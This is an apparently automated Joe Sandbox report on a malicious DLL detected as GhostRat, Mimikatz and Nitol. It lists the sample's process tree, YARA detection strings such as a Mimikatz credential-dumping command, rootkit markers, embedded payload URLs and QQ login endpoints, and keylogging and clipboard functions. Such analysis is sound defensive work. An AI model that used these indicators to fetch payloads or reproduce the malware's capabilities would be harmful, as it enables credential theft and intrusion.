Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l10U7QN0CY.dll

Overview

General Information

Sample name:l10U7QN0CY.dll
renamed because original name is a hash value
Original sample name:f036b3031238597750e077c2d03b2bc41d089f9db461244059db8485fac28e63.dll
Analysis ID:1557658
MD5:4a2579809a60dafdd9da2c50484e8735
SHA1:d3e1c79b5b5d7ab8ff2313d7696998527a3f5bd1
SHA256:f036b3031238597750e077c2d03b2bc41d089f9db461244059db8485fac28e63
Tags:103-45-64-91dlluser-JAMESWT_MHT
Infos:

Detection

GhostRat, Mimikatz, Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GhostRat
Yara detected Mimikatz
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionality to automate explorer (e.g. start an application)
Contains functionality to capture and log keystrokes
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Contains functionality to modify windows services which are used for security filtering and protection
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create new users
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5796 cmdline: loaddll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2676 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2408 cmdline: rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 6812 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1476 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6528 cmdline: rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,Shellex MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 6688 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4696 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MimiKatzVaronis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
  • APT32
  • Anunak
  • GALLIUM
https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz
NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
l10U7QN0CY.dllJoeSecurity_GhostRatYara detected GhostRatJoe Security
    l10U7QN0CY.dllJoeSecurity_NitolYara detected NitolJoe Security
      l10U7QN0CY.dllJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
        l10U7QN0CY.dllMimikatz_StringsDetects Mimikatz stringsFlorian Roth
        • 0x11fcd7:$x1: sekurlsa::logonpasswords
        l10U7QN0CY.dllINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
        • 0x10444a:$h1: Hid_State
        • 0x1169b0:$h1: Hid_State
        • 0x10445e:$h2: Hid_StealthMode
        • 0x1169d0:$h2: Hid_StealthMode
        • 0x10447e:$h3: Hid_HideFsDirs
        • 0x1169f0:$h3: Hid_HideFsDirs
        • 0x10449c:$h4: Hid_HideFsFiles
        • 0x116a10:$h4: Hid_HideFsFiles
        • 0x1044bc:$h5: Hid_HideRegKeys
        • 0x116a30:$h5: Hid_HideRegKeys
        • 0x1044dc:$h6: Hid_HideRegValues
        • 0x116a50:$h6: Hid_HideRegValues
        • 0x104500:$h7: Hid_IgnoredImages
        • 0x116a80:$h7: Hid_IgnoredImages
        • 0x104524:$h8: Hid_ProtectedImages
        • 0x116ab0:$h8: Hid_ProtectedImages
        • 0x108d66:$s1: FLTMGR.SYS
        • 0x11c6da:$s1: FLTMGR.SYS
        • 0x1092e2:$s2: HAL.dll
        • 0x105e86:$s3: \SystemRoot\System32\csrss.exe
        • 0x118630:$s3: \SystemRoot\System32\csrss.exe
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
          00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
            00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
              Process Memory Space: loaddll32.exe PID: 5796JoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
                Process Memory Space: rundll32.exe PID: 6528JoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
                  Click to see the 1 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  9.2.rundll32.exe.1010b380.2.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0xaa30:$h1: Hid_State
                  • 0xaa50:$h2: Hid_StealthMode
                  • 0xaa70:$h3: Hid_HideFsDirs
                  • 0xaa90:$h4: Hid_HideFsFiles
                  • 0xaab0:$h5: Hid_HideRegKeys
                  • 0xaad0:$h6: Hid_HideRegValues
                  • 0xab00:$h7: Hid_IgnoredImages
                  • 0xab30:$h8: Hid_ProtectedImages
                  • 0xfb5a:$s1: FLTMGR.SYS
                  • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
                  • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  9.2.rundll32.exe.1010b380.2.raw.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0xb630:$h1: Hid_State
                  • 0xb650:$h2: Hid_StealthMode
                  • 0xb670:$h3: Hid_HideFsDirs
                  • 0xb690:$h4: Hid_HideFsFiles
                  • 0xb6b0:$h5: Hid_HideRegKeys
                  • 0xb6d0:$h6: Hid_HideRegValues
                  • 0xb700:$h7: Hid_IgnoredImages
                  • 0xb730:$h8: Hid_ProtectedImages
                  • 0x1135a:$s1: FLTMGR.SYS
                  • 0xd2b0:$s3: \SystemRoot\System32\csrss.exe
                  • 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  5.2.loaddll32.exe.1010b380.2.raw.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0xb630:$h1: Hid_State
                  • 0xb650:$h2: Hid_StealthMode
                  • 0xb670:$h3: Hid_HideFsDirs
                  • 0xb690:$h4: Hid_HideFsFiles
                  • 0xb6b0:$h5: Hid_HideRegKeys
                  • 0xb6d0:$h6: Hid_HideRegValues
                  • 0xb700:$h7: Hid_IgnoredImages
                  • 0xb730:$h8: Hid_ProtectedImages
                  • 0x1135a:$s1: FLTMGR.SYS
                  • 0xd2b0:$s3: \SystemRoot\System32\csrss.exe
                  • 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  9.2.rundll32.exe.100fbd38.1.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0x7b12:$h1: Hid_State
                  • 0x7b26:$h2: Hid_StealthMode
                  • 0x7b46:$h3: Hid_HideFsDirs
                  • 0x7b64:$h4: Hid_HideFsFiles
                  • 0x7b84:$h5: Hid_HideRegKeys
                  • 0x7ba4:$h6: Hid_HideRegValues
                  • 0x7bc8:$h7: Hid_IgnoredImages
                  • 0x7bec:$h8: Hid_ProtectedImages
                  • 0xc42e:$s1: FLTMGR.SYS
                  • 0xc9aa:$s2: HAL.dll
                  • 0x954e:$s3: \SystemRoot\System32\csrss.exe
                  • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  • 0x258:$s5: INIT
                  • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
                  5.2.loaddll32.exe.1010b380.2.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0xaa30:$h1: Hid_State
                  • 0xaa50:$h2: Hid_StealthMode
                  • 0xaa70:$h3: Hid_HideFsDirs
                  • 0xaa90:$h4: Hid_HideFsFiles
                  • 0xaab0:$h5: Hid_HideRegKeys
                  • 0xaad0:$h6: Hid_HideRegValues
                  • 0xab00:$h7: Hid_IgnoredImages
                  • 0xab30:$h8: Hid_ProtectedImages
                  • 0xfb5a:$s1: FLTMGR.SYS
                  • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
                  • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  Click to see the 25 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                  Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6688, TargetFilename: C:\Users\Public\Documents\MM

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: l10U7QN0CY.dllAvira: detected
                  Multi AV Scanner detection for submitted file
                  Source: l10U7QN0CY.dllReversingLabs: Detection: 68%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.3% probability
                  Machine Learning detection for sample
                  Source: l10U7QN0CY.dllJoe Sandbox ML: detected
                  Source: l10U7QN0CY.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  Source: Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll
                  Source: Binary string: rundll32.pdb source: rundll32.exe, 00000009.00000002.3726452574.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.9.dr
                  Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000009.00000002.3726452574.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.9.dr
                  Source: Binary string: F:\hidden-master\Debug\QAssist.pdb source: loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,5_2_100254C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,9_2_100254C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,5_2_10009080
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_100092A0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,5_2_100097D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,5_2_1002AB10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009B60 FindFirstFileA,FindClose,FindClose,5_2_10009B60
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,5_2_10009C40
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,5_2_1000BD50
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,9_2_10009080
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_100092A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,9_2_100097D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,9_2_1002AB10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009B60 FindFirstFileA,FindClose,FindClose,9_2_10009B60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,9_2_10009C40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,9_2_1000BD50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10008E50 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlenA,lstrlenA,lstrlenA,GetVolumeInformationA,SHGetFileInfoA,lstrlenA,lstrlenA,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlenA,5_2_10008E50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]5_2_1002E040
                  Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then test byte ptr [101218D4h], 00000008h5_2_1003E318
                  Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then movdqa dqword ptr [edi], xmm75_2_1003E490
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]9_2_1002E040
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then test byte ptr [101218D4h], 00000008h9_2_1003E318
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then movdqa dqword ptr [edi], xmm79_2_1003E490
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10014060 InternetOpenA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpSendRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpQueryInfoA,#823,HttpQueryInfoA,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,strstr,strstr,#825,strstr,strncpy,strstr,#825,strstr,strncat,strstr,#825,InternetOpenA,InternetConnectA,InternetCloseHandle,sprintf,sprintf,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,sprintf,HttpSendRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,atol,#823,InternetReadFile,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,MultiByteToWideChar,#823,MultiByteToWideChar,#825,WideCharToMultiByte,#823,WideCharToMultiByte,#825,strstr,#825,#825,5_2_10014060
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllString found in binary or memory: http://ptlogin2.qun.qq.com%s
                  Source: loaddll32.exe, rundll32.exeString found in binary or memory: http://ptlogin2.qun.qq.com%sAccept-Language:
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllString found in binary or memory: http://qun.qq.com%s
                  Source: loaddll32.exe, rundll32.exeString found in binary or memory: http://qun.qq.com%sAccept-Language:
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt
                  Source: loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps://
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllString found in binary or memory: https://localhost.ptlogin2.qq.com:4301%s
                  Source: loaddll32.exe, rundll32.exeString found in binary or memory: https://localhost.ptlogin2.qq.com:4301%sAccept-Language:
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllString found in binary or memory: https://ssl.ptlogin2.qq.com%s
                  Source: loaddll32.exe, rundll32.exeString found in binary or memory: https://ssl.ptlogin2.qq.com%sAccept-Language:
                  Source: rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllString found in binary or memory: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture and log keystrokes
                  Source: C:\Windows\System32\loaddll32.exeCode function: <BackSpace>5_2_1000B840
                  Source: C:\Windows\System32\loaddll32.exeCode function: <Enter>5_2_1000B840
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: <BackSpace>9_2_1000B840
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: <Enter>9_2_1000B840
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100025B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,5_2_100025B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100026B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,5_2_100026B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,5_2_10002770
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100029D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_100029D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10017BB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,5_2_10017BB0
